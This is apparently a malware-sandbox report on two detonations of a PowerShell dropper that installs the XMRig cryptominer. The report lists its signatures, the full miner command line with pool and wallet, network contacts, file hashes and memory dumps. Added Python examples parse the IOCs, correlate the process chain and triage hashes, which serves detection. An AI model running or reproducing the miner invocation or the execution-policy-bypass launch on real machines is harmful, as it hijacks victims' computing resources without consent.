| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:24 |
| Platform | win10v2004-20240508-en |
| Max time kernel | 1793s |
| Max time network | 1776s |
| Command Line | N/A |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches; the report renders no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3044 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
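The two command lines above are the most reusable indicators in this run: the pool, the payout wallet and the worker name are all carried in the xmrig.exe argv. The Python below is an added example, not part of this report or of the sandbox's tooling. It tokenizes the Windows command line, maps the XMRig options, splits the `-o` stratum URL with the standard library and splits the `-u` value on the unMineable `COIN:<address>.<worker>` convention (an assumption drawn from the value's shape). The command line is embedded as constructed input, assumed to be the verbatim, untruncated argv shown above. The wallet check is a cheap base58 shape filter (95 characters, leading `4` or `8`), not address validation; `-a rx` is XMRig's RandomX algorithm selector.

```python
"""Pull the mining IOCs out of an XMRig command line as a sandbox report records it."""
import re
from urllib.parse import urlsplit

# Constructed sample: the xmrig.exe command line exactly as the behavioral7 run
# records it (assumed to be the verbatim, untruncated argv).
SAMPLE_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    r'.unmineable_worker_vilqtiac -p x'
)

# Monero addresses use the Bitcoin base58 alphabet (no 0, O, I, l).
_B58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def looks_like_monero_address(addr: str) -> bool:
    """Shape check only (no checksum): 95 base58 chars, standard address ('4')
    or subaddress ('8'). 106-char integrated addresses are deliberately rejected."""
    return len(addr) == 95 and addr[0] in "48" and set(addr) <= _B58


def split_windows_argv(cmdline: str) -> list:
    """Minimal Windows-style tokenizer: a double-quoted run (may contain spaces)
    or a bare whitespace-delimited word; backslashes are literal."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_xmrig_cmdline(cmdline: str) -> dict:
    argv = split_windows_argv(cmdline)
    opts, i = {}, 1
    while i < len(argv):
        if argv[i].startswith("-") and i + 1 < len(argv):   # "-a rx" style pairs
            opts[argv[i]] = argv[i + 1]
            i += 2
        else:
            i += 1
    pool = urlsplit(opts.get("-o", ""))          # e.g. stratum+ssl://host:port
    # unMineable convention (assumed from the value's shape): COIN:<payout address>.<worker>
    coin, _, rest = opts.get("-u", "").partition(":")
    wallet, _, worker = rest.partition(".")
    return {
        "image": argv[0] if argv else "",
        "algorithm": opts.get("-a"),             # rx = RandomX (Monero)
        "pool_scheme": pool.scheme,
        "pool_host": pool.hostname,
        "pool_port": pool.port,
        "pool_tls": pool.scheme in ("stratum+ssl", "stratum+tls"),
        "coin": coin,
        "wallet": wallet,
        "wallet_shape_ok": looks_like_monero_address(wallet),
        "worker": worker,
        "password": opts.get("-p"),
    }


if __name__ == "__main__":
    for k, v in parse_xmrig_cmdline(SAMPLE_CMDLINE).items():
        print(f"{k:16} {v}")
```

The pool host and wallet are the fields worth pivoting on: the host appears again in the Network table of every run on this page, and the wallet is the only value the operator cannot rotate without losing payouts.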
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
memory/3044-0-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp
memory/3044-1-0x000001C76D800000-0x000001C76D822000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3j0y50v.dj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3044-11-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-12-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-14-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-15-0x000001C76DAB0000-0x000001C76DAC2000-memory.dmp
memory/3044-16-0x000001C76D7E0000-0x000001C76D7EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1692-47-0x00000284ECC40000-0x00000284ECC60000-memory.dmp
memory/1692-48-0x00000284ECC90000-0x00000284ECCB0000-memory.dmp
memory/1692-49-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/3044-50-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/3044-52-0x00007FFEE9C43000-0x00007FFEE9C45000-memory.dmp
memory/1692-51-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-54-0x00000284EE570000-0x00000284EE590000-memory.dmp
memory/1692-55-0x00000284EE590000-0x00000284EE5B0000-memory.dmp
memory/3044-53-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/1692-56-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/3044-57-0x00007FFEE9C40000-0x00007FFEEA701000-memory.dmp
memory/1692-58-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-60-0x00000284EE590000-0x00000284EE5B0000-memory.dmp
memory/1692-59-0x00000284EE570000-0x00000284EE590000-memory.dmp
memory/1692-61-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-62-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-63-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-64-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-65-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-66-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-67-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-68-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-69-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-70-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-71-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-72-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-73-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-74-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-75-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-76-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-77-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-78-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-79-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-80-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-81-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-82-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-83-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-84-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-85-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-86-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-87-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-88-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-89-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-90-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-91-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-92-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-93-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-94-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-95-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-96-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-97-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-98-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-99-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-100-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-101-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-102-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-103-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-104-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-105-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-106-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-107-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-108-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-109-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-110-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-111-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-112-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-113-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-114-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-115-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-116-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-117-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-118-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
memory/1692-119-0x00007FF7106A0000-0x00007FF7112D3000-memory.dmp
Analysis: behavioral18
Detonation Overview
| Field | Value |
| Submitted | 2024-05-27 00:27 |
| Reported | 2024-05-27 01:28 |
| Platform | win10-20240404-en |
| Max time kernel | 1799s |
| Max time network | 1750s |
| Command Line | N/A |
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches; the report renders no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1448 wrote to memory of 4344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1448 wrote to memory of 4344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 138.91.171.81:80 | N/A | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
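The Signatures, Processes and Network sections of this run describe one chain: powershell.exe started with `-ExecutionPolicy bypass` on a script in the user's Temp directory, it writes to and spawns an executable dropped under Temp (the WriteProcessMemory entries name PID 1448 and 4344), that child carries a stratum pool URL, and the pool name is then resolved and contacted over 443. The Python below is an added example, not part of this report or of any vendor tooling: it implements that chain as a correlation rule over Sysmon-style process, DNS and network events and merges hits up the parent chain so the PowerShell stage and the miner stage surface as one alert. The events are constructed from this run's PIDs, images, command lines and the rx.unmineable.com resolution; the PowerShell parent PID, the event layout and the benign Robocopy control are invented. The `in-addr.arpa` lookups in the table are treated as resolver noise and not modelled, and the SeLockMemoryPrivilege request (which XMRig makes to allocate large pages for RandomX) is not modelled either, since the sample events carry no token data.

```python
"""Correlate the behaviour chain this run records (PowerShell -ExecutionPolicy
bypass on a script in %TEMP%, a child EXE under %TEMP%, a stratum pool URL in
its command line, DNS and TLS to that pool) over Sysmon-style events."""
import re
from collections import defaultdict

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
PS_BYPASS_RE = re.compile(r"-ExecutionPolicy\s+bypass", re.I)
STRATUM_RE = re.compile(r"\bstratum(?:\+(?:ssl|tls|tcp))?://([A-Za-z0-9.-]+)(?::\d+)?", re.I)
# Pool domains taken from this report; extend from your own intel.
POOL_DOMAINS = ("unmineable.com",)


def is_pool_domain(name: str) -> bool:
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in POOL_DOMAINS)


# Constructed sample events modelled on the behavioral18 run: PIDs, images and
# command lines are the report's; the event layout is a simplified Sysmon
# (EID 1 process create, 22 DNS query, 3 network connect). ppid 640 for the
# PowerShell parent and the Robocopy control are invented.
EVENTS = [
    {"eid": 1, "pid": 1448, "ppid": 640,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"'},
    {"eid": 22, "pid": 1448, "query": "objects.githubusercontent.com", "answer": "185.199.108.133"},
    {"eid": 1, "pid": 4344, "ppid": 1448,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"eid": 22, "pid": 4344, "query": "rx.unmineable.com", "answer": "161.35.34.195"},
    {"eid": 3, "pid": 4344, "dst_ip": "161.35.34.195", "dst_port": 443},
    # Benign control (invented): an admin script from Program Files spawning Robocopy.
    {"eid": 1, "pid": 900, "ppid": 640,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -File "C:\Program Files\Backup\nightly.ps1"'},
    {"eid": 1, "pid": 901, "ppid": 900, "image": r"C:\Windows\System32\Robocopy.exe",
     "cmd": r"Robocopy.exe D:\data E:\backup"},
]


def detect_miner_chain(events):
    procs = {e["pid"]: e for e in events if e["eid"] == 1}
    signals = defaultdict(set)   # pid -> names of matched behaviours
    iocs = defaultdict(set)      # pid -> pool hosts / IPs seen for that pid
    for e in events:
        pid = e["pid"]
        if e["eid"] == 1:
            img, cmd = e["image"], e["cmd"]
            if img.lower().endswith("powershell.exe") and PS_BYPASS_RE.search(cmd) and TEMP_RE.search(cmd):
                signals[pid].add("ps_bypass_script_in_temp")
            parent = procs.get(e.get("ppid"))
            if TEMP_RE.search(img) and parent and parent["image"].lower().endswith("powershell.exe"):
                signals[pid].add("powershell_spawned_temp_exe")
            m = STRATUM_RE.search(cmd)
            if m:
                signals[pid].add("stratum_url_in_cmdline")
                iocs[pid].add(m.group(1).lower())
        elif e["eid"] == 22 and is_pool_domain(e["query"]):
            signals[pid].add("dns_to_pool")
            iocs[pid].update({e["query"].lower(), e["answer"]})
        elif e["eid"] == 3 and e["dst_ip"] in iocs.get(pid, ()):
            signals[pid].add("connect_to_pool_ip")
            iocs[pid].add(f'{e["dst_ip"]}:{e["dst_port"]}')

    alerts = []
    for pid, own in list(signals.items()):
        # Walk up the parent chain so the PowerShell stage and the miner stage
        # are reported as one incident rather than two weak hits.
        chain, cur = [], pid
        while cur in procs:
            chain.append(cur)
            cur = procs[cur].get("ppid")
        merged = set().union(*(signals.get(p, set()) for p in chain))
        # A stratum URL alone is decisive; otherwise require three behaviours.
        if "stratum_url_in_cmdline" in own or len(merged) >= 3:
            alerts.append({"pid": pid, "chain": chain[::-1], "signals": sorted(merged),
                           "iocs": sorted(set().union(*(iocs.get(p, set()) for p in chain)))})
    return alerts


if __name__ == "__main__":
    for a in detect_miner_chain(EVENTS):
        print(a)
```

The threshold matters: `-ExecutionPolicy bypass` on a Temp script fires constantly in enterprises, and a PowerShell-spawned executable under Temp is common for installers, so neither is alertable alone. The stratum URL is the only single signal strong enough by itself; everything else is reported only when the chain accumulates three behaviours.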
Files
memory/1448-4-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/1448-5-0x000001A26F3D0000-0x000001A26F3F2000-memory.dmp
memory/1448-8-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-9-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-10-0x000001A26F580000-0x000001A26F5F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxroxigf.kgg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-25-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-48-0x000001A26F500000-0x000001A26F512000-memory.dmp
memory/1448-61-0x000001A26F1E0000-0x000001A26F1EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
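Two of the file entries above deserve a second look before they go into an IOC list. The `__PSScriptPolicyTest_*.ps1` hashes are the MD5, SHA-1 and SHA-256 of the single byte `1`, which is what this Windows build's PowerShell writes into its AppLocker/WDAC lockdown probe file: it is created by powershell.exe itself, not by the script, and it should not be treated as a dropped artefact (the behavioral7 run on the other platform shows a different hash for its probe, so the content is build-dependent). The `xmrig.exe` hash, by contrast, is identical in every run on this page and is the file IOC. The Python below is an added example, not part of this report: it parses Files entries in the page's own layout, verifies the probe by recomputing the digests of `b"1"` rather than by filename alone, and keeps executables dropped under Temp as IOCs. The input is constructed from the two entries above.

```python
"""Triage the Files entries of a run: recognise PowerShell's AppLocker/WDAC
policy probe (__PSScriptPolicyTest_*.ps1) by its content hash and keep only
genuinely dropped executables as file IOCs."""
import hashlib
import re

# Constructed input: two Files entries copied from the behavioral18 run above,
# in the page's own layout (a memory-dump line is included to show it is skipped).
FILES_TEXT = r"""
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sxroxigf.kgg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1448-25-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
"""

HASH_ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
POLICY_PROBE_RE = re.compile(r"^__PSScriptPolicyTest_[A-Za-z0-9]+\.[A-Za-z0-9]+\.ps1$")
# What PowerShell wrote into the probe file in the win10-20240404 runs on this
# page: the single byte "1". The page's hashes are exactly the digests of that
# byte; other PowerShell builds write a longer comment script instead.
PROBE_CONTENT = b"1"


def digests(data: bytes) -> dict:
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256", "sha512")}


def parse_files_section(text: str) -> list:
    """Group 'path' lines with the hash rows that follow them; skip memory dumps."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("memory/"):
            continue
        m = HASH_ROW_RE.match(line)
        if m and current is not None:
            current["hashes"][m.group(1).lower()] = m.group(2).lower()
        elif not line.startswith("|"):
            current = {"path": line, "hashes": {}}
            entries.append(current)
    return entries


def classify(entry: dict) -> str:
    name = entry["path"].rsplit("\\", 1)[-1]
    h = entry["hashes"]
    if POLICY_PROBE_RE.match(name):
        ref = digests(PROBE_CONTENT)
        # Verify by content, not by name: every digest the report lists must match.
        if h and all(h[k] == ref[k] for k in h):
            return "benign: PowerShell policy probe, content verified as b'1'"
        return "benign-likely: PowerShell policy probe name, content not verified"
    if "\\appdata\\local\\temp\\" in entry["path"].lower() and name.lower().endswith(".exe"):
        return "ioc: executable dropped under %TEMP%"
    return "review"


def triage(text: str) -> list:
    return [(e["path"], classify(e), e["hashes"].get("sha256")) for e in parse_files_section(text)]


if __name__ == "__main__":
    for path, verdict, sha256 in triage(FILES_TEXT):
        print(f"{verdict:60} {sha256}  {path}")
```

Checking the probe by content rather than by name is deliberate: the `__PSScriptPolicyTest_` prefix is predictable, so a dropper could hide a real script behind it, and a name-only rule would wave that through.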
memory/4344-90-0x0000027212110000-0x0000027212130000-memory.dmp
memory/4344-91-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/1448-94-0x00007FF97EED0000-0x00007FF97F8BC000-memory.dmp
memory/1448-93-0x00007FF97EED3000-0x00007FF97EED4000-memory.dmp
memory/4344-92-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
memory/4344-95-0x00007FF6763B0000-0x00007FF676FE3000-memory.dmp
